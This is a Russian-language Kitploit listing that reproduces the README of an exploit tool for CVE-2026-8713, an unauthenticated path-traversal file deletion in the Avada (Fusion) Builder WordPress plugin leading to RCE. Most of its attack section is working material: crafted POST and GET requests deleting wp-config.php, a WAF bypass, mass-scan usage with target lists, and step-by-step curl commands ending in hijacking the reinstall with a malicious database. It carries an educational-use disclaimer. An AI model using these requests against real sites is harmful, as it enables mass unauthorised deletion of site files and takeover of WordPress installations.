Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-8713 — Обход пути без аутентификации до произвольного удаления файлов в Avada (Fusion) Builder <= 3.15.3, приводящий к выполнению произвольного кода (RCE) (CVSS 9.1) | Kitploit
Инструменты/GitHubGitHub/shinthink/cve-2026-8713
Сканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбход WAFВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubshinthink/cve-2026-8713

CVE-2026-8713

Обход пути без аутентификации до произвольного удаления файлов в Avada (Fusion) Builder <= 3.15.3, приводящий к выполнению произвольного кода (RCE) (CVSS 9.1)

Репозиторий
452 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-8713 — Эксплойт для Avada (Fusion) Builder WordPress

Path Traversal без аутентификации → Произвольное удаление файлов → Принудительная переустановка → RCE


Обзор

CVE-2026-8713 — критическая уязвимость с рейтингом CVSS 9.1 в плагине/теме Avada (Fusion) Builder для WordPress. Функция maybe_delete_files() в классе Fusion_Form_DB_Entries формирует пути к файловой системе на основе значений полей формы, контролируемых атакующим, используя простую замену строк — без проверки или ограничений по каталогам.

realpath()

Неаутентифицированный атакующий отправляет payload с path traversal через обработчик fusion_form_submit_ajax. Когда хук завершения работы Fusion_Form_DB_Privacy обрабатывает запись с privacy_expiration_action=delete, целевой файл удаляется с сервера.

Уязвимые версии

ВерсияСтатус
Fusion Builder ≤ 3.15.3Уязвима
Fusion Builder ≥ 3.15.4Исправлена
Тема Avada (все версии)Встроенный плагин может быть уязвим

Примечание: Номер версии темы Avada (7.x) отличается от номера версии плагина Fusion Builder (3.x). Уязвимость находится в плагине, но сканер определяет обе составляющие.


Механизм уязвимости

Первопричина

В файле fusion-builder/inc/class-fusion-form-db-entries.php метод maybe_delete_files() вычисляет пути к файлам с помощью замены строк без проверки изоляции каталогов:

root@kitploit:~
$file_path = str_replace($upload['url'], $upload['path'], $value);
// Проверка realpath() отсутствует — последовательности path traversal проходят
unlink($file_path);

Цепочка атаки

root@kitploit:~
1. Атакующий отправляет форму Avada через wp_ajax_nopriv_fusion_form_submit_ajax
   → Path traversal: ../../wp-config.php
   → privacy_expiration_action = delete
   → privacy_expiration_interval = 0

2. Хук завершения работы WordPress запускает Fusion_Form_DB_Privacy
   → Обрабатывает сохранённую запись формы
   → Вызывает maybe_delete_files() для пути, контролируемого атакующим
   → wp-config.php удалён

3. WordPress переходит в режим установки/настройки
   → Атакующий подключает сайт к вредоносной базе данных
   → Полное удалённое выполнение кода

Доступ без аутентификации

Обработчик AJAX зарегистрирован с помощью wp_ajax_nopriv_, что делает его доступным для неаутентифицированных пользователей:

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=fusion_form_submit_ajax
  form_id=<id>
  privacy_expiration_action=delete
  fusion_privacy_expiration_interval=0
  fusion_form_field_<name>=../../wp-config.php

Обход WAF

Многие хостинги блокируют POST-запросы к /wp-admin/admin-ajax.php. WordPress принимает параметры через GET на этой же конечной точке, что даёт тривиальный способ обхода:

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...

Установка

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt

Использование

root@kitploit:~
# Только обнаружение (по умолчанию — без удаления файлов)
python cve_2026_8713.py -t target.com

# Массовое обнаружение
python cve_2026_8713.py -f targets.txt

# Режим эксплуатации — удалить wp-config.php
python cve_2026_8713.py -t target.com --exploit

# Удаление произвольного файла
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"

Аргументы

root@kitploit:~
  -t, --target      Одна цель (домен или IP)
  -f, --file        Список целей, по одной на строку
  --exploit         Включить удаление файлов (по умолчанию: только обнаружение)
  --delete PATH     Путь к произвольному файлу для удаления (по умолчанию: wp-config.php)
  -o, --output      Сохранить результаты в файл
  --threads         Количество потоков (по умолчанию: 20)
  -v, --verbose     Показывать подробный вывод

Доказательство концепции

Режим обнаружения

root@kitploit:~
$ python cve_2026_8713.py -f targets.txt
root@kitploit:~
  CVE-2026-8713  Avada (Fusion) Builder  |  CVSS 9.1
  Mode: Detection  |  Targets: 521  |  Workers: 20
  ───────────────────────────────────────────────────────

  [EXPLOIT]  target-vuln.com      1.2s  form #3  (AJAX open)
  [VULN]     target-waf.com       2.1s  form #1  (WAF blocked)
  [AVADA]    target-noform.com    0.5s  (no form found)
  [-]        target-noavada.com   0.3s

  ───────────────────────────────────────────────────────
  Scan complete  |  Time: 45s
  ───────────────────────────────────────────────────────
  Targets        : 521
  Avada detected : 47
  Forms found    : 12
  Vulnerable     : 9

Режим эксплуатации

root@kitploit:~
$ python cve_2026_8713.py -t target.com --exploit -v
root@kitploit:~
  CVE-2026-8713 — Avada Builder Exploit
  CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE

    [+] Found Avada form: id=3
    [+] POST form_id=3: HTTP 403 (WAF blocked)
    [+] GET form_id=3: HTTP 200 (WAF bypassed)

  Host     : target.com
  Avada    : YES
  Form     : 3
  Deleted  : wp-config.php (force reinstall → RCE)
  Time     : 3.2s

Ручная эксплуатация

Шаг 1 — Проверить Avada

root@kitploit:~
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5

Шаг 2 — Найти ID формы

root@kitploit:~
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/main/%5Cd%2B)'

Шаг 3 — Отправить форму с path traversal

root@kitploit:~
curl -sk -X POST \
  -d 'action=fusion_form_submit_ajax' \
  -d 'form_id=3' \
  -d 'privacy_expiration_action=delete' \
  -d 'fusion_privacy_expiration_interval=0' \
  -d 'fusion_form_field_x=../../wp-config.php' \
  'https://target.com/wp-admin/admin-ajax.php'

Шаг 4 — Обход WAF (если POST заблокирован)

root@kitploit:~
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'

Шаг 5 — Проверить и применить RCE

root@kitploit:~
# Сайт в режиме установки?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config удалён → подключить вредоносную БД → полный RCE

Отказ от ответственности

ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ И ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ.

Данное программное обеспечение предназначено для специалистов по безопасности, проводящих авторизованные тесты на проникновение, организаций, проверяющих собственную инфраструктуру, и исследователей, изучающих эксплуатацию уязвимостей.

Несанкционированный доступ к компьютерным системам незаконен и может нарушать:

  • США: Закон о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. 1030)
  • Индонезия: UU ITE, статьи 30 и 46
  • Европейский союз: Директива 2013/40/EU
  • Великобритания: Закон о неправомерном использовании компьютеров 1990 г.

Авторы не несут ответственности за неправомерное использование.


Ссылки

РесурсСсылка
Уведомление IONIXionix.io/threat-center/cve-2026-8713
Уведомление Wordfencewordfence.com
Patchstackpatchstack.com
Запись NVDCVE-2026-8713

Этот проект не связан с ThemeFusion или Avada.

Скачать инструмент